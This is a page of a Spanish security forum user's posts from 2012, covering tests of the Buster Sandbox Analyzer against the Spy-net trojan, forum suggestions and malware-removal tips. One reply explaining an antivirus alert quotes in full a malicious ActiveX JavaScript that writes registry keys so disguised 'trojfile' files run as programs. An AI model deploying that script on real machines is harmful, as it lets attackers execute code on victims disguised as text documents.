| |
|
1101
|
Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer
|
en: 22 Abril 2012, 13:00 pm
|
|
Creo saber hasta cierto punto el uso de Sandboxie, probé ejecutar el server aunque obvio no lo oculté/modifiqué/adjunté con nada, prueba directa. De esta forma lo hice la vez anterior (no hace mucho tiempo, que digamos) y como te comenté saltó la sandbox y ese aviso no salía tampoco.
Te comento la forma de como lo hice y si sería de otra forma corrigeme, ya que estamos me gustaría saber mas cosas.
Desde el menu contextual "Ejecutar aislado en una sandbox", no tiene mucho misterio, pero bueno.
Me volveré a leer la guia de nuevo, a ver que paso por alto, o en que me equivoco.
Saludos.
|
|
|
|
|
1102
|
Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer
|
en: 22 Abril 2012, 12:33 pm
|
Mil disculpas, sería que no estaba actualizada, lo probé en un sistema anfitrión y como bien dices no deja instalarlo:  Pero en serio que hizo la conexion el servidor sin problemas, ahora no ya quedó aclarado, al aceptar se elimina la conexión... Gracias por la correción, de nuevo saludos. |
|
|
|
|
1103
|
Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer
|
en: 22 Abril 2012, 12:17 pm
|
|
Lo probé en una virtual con la última versión que encontré del Spy-net, si que decir que la sandbox no estaba actualizada, no utilizo la versión full, solo la de prueba.
Voy a probarlo de nuevo, y dejaré el server con la misma configuración y la sandbox actualizada, de todas formas te subo el server y lo pruebas tu mismo.
Saludos.
|
|
|
|
|
1104
|
Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer
|
en: 22 Abril 2012, 12:07 pm
|
|
Hola Buster, no lo decía en el sentido de que te hubiesen ayudado o hecho el trabajo, me refería a lo que has comentado aunque parece me quedó diferente, bueno eso.
Probando...
Una cosa, haciendo pruebas con un trojan (spynet) aunque un pelín viejo salta la sandbox e infecta la máquina anfitrión, estoy haciendo pruebas con tu tool y otros troyanos a ver como se comporta.
Saludos.
|
|
|
|
|
1105
|
Foros Generales / Sugerencias y dudas sobre el Foro / Re: sugerencia
|
en: 22 Abril 2012, 11:35 am
|
|
Hola Golo12, supongo se podría hacer (lo he visto en otros foros), esto lo han de decidir los administradores, pero en si ya se publica la fecha en la que se creó el tema, lo único que hay usuarios que no miran cuando fue publicada la última respuesta, postean y luego resulta que el post lleva "cerrado" X años...
Incluso si se modifica un post queda grabada la fecha y hora de la corrección.
Creo que es mas cuestión de fijarse pero bueno.
Saludos.
|
|
|
|
|
1106
|
Seguridad Informática / Seguridad / Re: avast! infection detected en subforo analisis y diseño de malware
|
en: 22 Abril 2012, 08:45 am
|
Hola xiruko como puedes ver en la alerta es por un script del siguiente code: <script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");
}
catch(e) {}
}
catch(e) {}
}
setTimeout("f()", 1000);
</script> Pegas ese code en un txt lo nombras como "ejemplo.js" y lo subes a analizar. Aquí tienes el script analizado en Jotti: Link: http://virusscan.jotti.org/es/scanresult/1e34f284e7944cbc9a58fe2a52a9b38697aaced4 2012-04-21 JS:Seeker-ESaludos y gracias por el aviso !!! |
|
|
|
|
1107
|
Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer
|
en: 17 Abril 2012, 00:00 am
|
|
He estado leyendo el About y tuviste apoyo de gente muy conocida en este campo, me alegro.
Tienes provisto incluir la traducción al español?
Aunque todavía esta en proyecto y al final no se si se lanzará, incluimos tu herramienta en un AIO de análisis de Malware (All in one - Todo en uno). Si se llevara a cabo tenemos tu permiso ¿no?...
Saludos, sigue así buena tool.
|
|
|
|
|
1108
|
Seguridad Informática / Seguridad / Re: Problema
|
en: 16 Abril 2012, 23:38 pm
|
Sinceramente, aunque no soy mod ni nada creo que lo de los comentarios se va a hacer caso omiso o en su lugar utilizarlo de papel de water, lo mismo da  team es el Bluesky el Pr0xxx0r  Me ha empezado a entrar miedo, no se, pedazo de juanker de hotmail, chat de Ares y alguna cosa mas, pero que vamos... No digo nada mas, un saludo. |
|
|
|
|
1109
|
Seguridad Informática / Seguridad / Re: Pc bloqueado por virus?, me exige un pago.
|
en: 16 Abril 2012, 23:24 pm
|
Hasta hace poco no he tenido problemas , pero llevo un par de meses que me entran por todos lados.
¿como puedo protegerme mejor?. Revisaste tener actualizados los plugins del navegador (flash, reader, java)? Por ahí te pueden entrar bastantes, tener el Sistema Operativo actualizado tambien te ayudará... Probaste cambiar de Firewall, hay varios y gratuitos, se mejoró algo el de Windows pero los hay mejores. Añade a tus herramientas de desinfección "Malwarebytes", funciona bastante bien. Saludos. |
|
|
|
|
|
| |
|
Mostrar Mensajes
